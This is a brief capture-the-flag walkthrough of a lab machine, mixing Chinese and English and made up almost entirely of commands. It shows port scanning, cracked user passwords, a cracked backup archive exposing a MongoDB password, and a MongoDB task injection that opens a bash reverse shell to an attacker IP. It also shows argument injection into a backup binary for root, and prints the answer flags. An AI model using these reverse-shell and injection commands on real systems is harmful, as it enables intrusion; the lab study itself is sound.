信息收集
IP Address | Opening Ports |
---|---|
10.10.10.58 | TCP:22,3000 |
$ nmap -p- 10.10.10.58 --min-rate 1000 -sC -sV -Pn
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dc:5e:34:a6:25:db:43:ec:eb:40:f4:96:7b:8e:d1:da (RSA)
| 256 6c:8e:5e:5f:4f:d5:41:7d:18:95:d1:dc:2e:3f:e5:9c (ECDSA)
|_ 256 d8:78:b8:5d:85:ff:ad:7b:e6:e2:b5:da:1e:52:62:36 (ED25519)
3000/tcp open hadoop-tasktracker Apache Hadoop
| hadoop-datanode-info:
|_ Logs: /login
|_http-title: MyPlace
| hadoop-tasktracker-info:
|_ Logs: /login
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
HTTP & Backup zip
http://10.10.10.58:3000/
http://10.10.10.58:3000/api/users/
https://crackstation.net/
http://10.10.10.58:3000/login
username:myP14ceAdm1nAcc0uNT,tom,mark,rastating
password:manchester,spongebob,snowflake,NULL
$ binwalk myplace.backup
$ cat myplace.backup|base64 -d >myplace.backup.decode
$ zip2john myplace.backup.decode -o myplace.backup.decode.john
$ john --wordlist=/usr/share/wordlists/rockyou.txt myplace.backup.decode.john
password:magicword
$ unzip myplace.backup.decode
$ cat var/www/myplace/app.js
mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace
TRP00F Skip Root
https://github.com/MartinxMax/trp00f
$ python3 trp00f.py --lhost 10.10.16.24 --lport 10033 --rhost 10.10.16.24 --rport 10034 --http 9999 --password '5AYRft73VtFpc84k'
mark to tom & mongoDB 任务注入
$ ssh mark@10.10.10.58
$ cat /var/www/myplace/app.js
该脚本将连接到Mongo数据库,然后每30秒运行一系列命令。它将从任务集合中获取项。对于每个文档,它会将doc.cmd传递给exec运行它,然后删除该文档。
$ mongo -u mark -p 5AYRft73VtFpc84k scheduler
> show collections
> db.tasks.insert({"cmd": "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.16.24/10035 0>&1'"})
> db.tasks.find()
User.txt
b0ca19843af3d049a782f7f16b0cf144
权限提升 & 命令注入
$ file /usr/local/bin/backup
在第一个参数中存在一个-q选项
$ /usr/local/bin/backup -q "" '
/bin/bash'
Root.txt
2278ab816e1cd3204d1b331144bf9704